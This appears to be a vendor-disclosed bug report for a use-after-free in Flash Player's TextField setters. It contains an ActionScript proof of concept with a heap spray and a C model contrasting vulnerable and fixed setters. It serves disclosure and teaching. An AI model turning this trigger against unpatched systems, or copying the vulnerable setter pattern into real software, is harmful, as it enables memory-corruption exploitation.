Status: Fixed
Closed: Aug 2015
Use-after-free in TextField.gridFitType
Project Member Reported by natashenka@google.com, Jun 1 2015
There is a use-after-free in the TextField gridFitType setter. A PoC is below:

// Create the TextField whose native setter will be re-entered.
var test = this.createTextField("test", 1, 0, 0, 100, 100);
// Assigning an object forces a string conversion, so func() runs from inside the gridFitType setter.
var n = {toString : func, valueOf : func};
test.gridFitType = n;

function func(){
	// Free the TextField's backing object while the setter is still executing.
	test.removeTextField();
	// Spray allocations so the freed memory is reused before the setter writes to it.
	for(var i = 0; i < 1000; i++){
		var b = new flash.display.BitmapData(1000, 1000, true, 10);
	}
	trace("here");
	return "natalie";
}

A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition; additional SWFs are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
tftestsi.fla
1.2 MB Download
tftestsi.fla
1.2 MB Download
tftest.swf
808 KB Download
tftestthickness.swf
808 KB Download
tftest.fla
1.2 MB Download
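The bug class behind this report is a setter that calls back into script (toString/valueOf) while holding a raw pointer to the object being modified, then writes through that pointer after the callback has destroyed the object and the script has reallocated its memory. The C model below is an added example and is not Adobe's code or the actual Flash Player fix; TextField, BitmapData, the slab allocator and the refcount are all hypothetical stand-ins, and the "hold a reference, re-validate after the call-out" pattern in the fixed setter is a generic mitigation for this pattern, not what apsb15-19 necessarily shipped.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy slab allocator (hypothetical): freed chunks are handed out again first-fit,
 * so the spray allocation in the callback lands on the TextField's old chunk. */
#define SLOT_BYTES 64
#define SLOT_COUNT 4
typedef struct { unsigned char mem[SLOT_BYTES]; int in_use; } Slot;
static Slot slab[SLOT_COUNT];

static void *slab_alloc(void) {
    for (int i = 0; i < SLOT_COUNT; i++)
        if (!slab[i].in_use) { slab[i].in_use = 1; memset(slab[i].mem, 0, SLOT_BYTES); return slab[i].mem; }
    return NULL;
}
static void slab_free(void *p) {
    for (int i = 0; i < SLOT_COUNT; i++)
        if (slab[i].mem == p) { slab[i].in_use = 0; memset(slab[i].mem, 0xDD, SLOT_BYTES); return; }
}
static void slab_reset(void) { memset(slab, 0, sizeof slab); }

/* Stand-ins for the runtime objects involved in the PoC. */
typedef struct { int refcount; int attached; char grid_fit_type[16]; } TextField;
typedef struct { uint32_t width, height, fill; } BitmapData;

static TextField *tf_create(void) { TextField *tf = slab_alloc(); tf->refcount = 1; tf->attached = 1; return tf; }
static void tf_addref(TextField *tf) { tf->refcount++; }
static void tf_release(TextField *tf) { if (--tf->refcount == 0) slab_free(tf); }

/* A script value whose string conversion runs script code (toString / valueOf). */
typedef const char *(*to_string_fn)(void *ctx);
typedef struct { to_string_fn to_string; void *ctx; } Value;

/* Script-side state: the handle to the text field and the spray object it allocates. */
typedef struct { TextField **field; BitmapData *bmp; } ScriptState;

/* Models func() in the PoC: removeTextField(), then allocate a BitmapData to reclaim the chunk. */
static const char *script_to_string(void *ctx) {
    ScriptState *st = ctx;
    TextField *tf = *st->field;
    tf->attached = 0;
    tf_release(tf);                 /* drop the display list's reference; frees if nobody else holds one */
    *st->field = NULL;              /* script can no longer reach the object */
    st->bmp = slab_alloc();         /* "new BitmapData(1000, 1000, true, 10)" */
    st->bmp->width = 1000; st->bmp->height = 1000; st->bmp->fill = 10;
    return "natalie";
}

/* Vulnerable shape: convert the value (re-entering script), then write through the original pointer. */
static void set_grid_fit_type_vulnerable(TextField *tf, const Value *v) {
    const char *s = v->to_string(v->ctx);
    strncpy(tf->grid_fit_type, s, sizeof tf->grid_fit_type - 1);   /* tf may be dangling here */
}

/* Hardened shape: keep the object alive across the call-out and re-check its state afterwards. */
static void set_grid_fit_type_fixed(TextField *tf, const Value *v) {
    tf_addref(tf);
    const char *s = v->to_string(v->ctx);
    if (tf->attached)                                               /* script may have removed it */
        strncpy(tf->grid_fit_type, s, sizeof tf->grid_fit_type - 1);
    tf_release(tf);                                                 /* frees now if the script dropped it */
}

/* Returns 1 when the BitmapData reused the freed chunk and the setter's write corrupted it. */
int demo_vulnerable(void) {
    slab_reset();
    TextField *field = tf_create();
    void *chunk = field;
    ScriptState st = { &field, NULL };
    Value v = { script_to_string, &st };
    set_grid_fit_type_vulnerable(field, &v);
    return (void *)st.bmp == chunk && st.bmp->fill != 10;   /* "nata" overwrote the fill colour */
}

/* Returns 1 when the BitmapData got its own chunk and the TextField was freed only after the setter returned. */
int demo_fixed(void) {
    slab_reset();
    TextField *field = tf_create();
    void *chunk = field;
    ScriptState st = { &field, NULL };
    Value v = { script_to_string, &st };
    set_grid_fit_type_fixed(field, &v);
    return (void *)st.bmp != chunk && st.bmp->fill == 10 && !slab[0].in_use;
}

int main(void) {
    printf("vulnerable setter corrupted the spray object: %d\n", demo_vulnerable());
    printf("fixed setter kept the spray object intact:    %d\n", demo_fixed());
    return 0;
}
```

The setter in the vulnerable path writes fifteen bytes at offset 8 of a chunk that now belongs to a BitmapData, which is exactly the position the PoC's spray is meant to occupy; in a real runtime the overwritten field would be a pointer or size rather than a fill colour. The same addref-before-callout discipline applies to the other setters the report lists (thickness, tabIndex), since each of them converts a script value before touching the object.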
Project Member Comment 1 by natashenka@google.com, Jun 3 2015
PSIRT-3788
Project Member Comment 2 by natashenka@google.com, Aug 11 2015
Labels: CVE-2015-5557 Id-3788
Status: Fixed
Project Member Comment 3 by natashenka@google.com, Aug 18 2015
Labels: -Restrict-View-Commit
Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html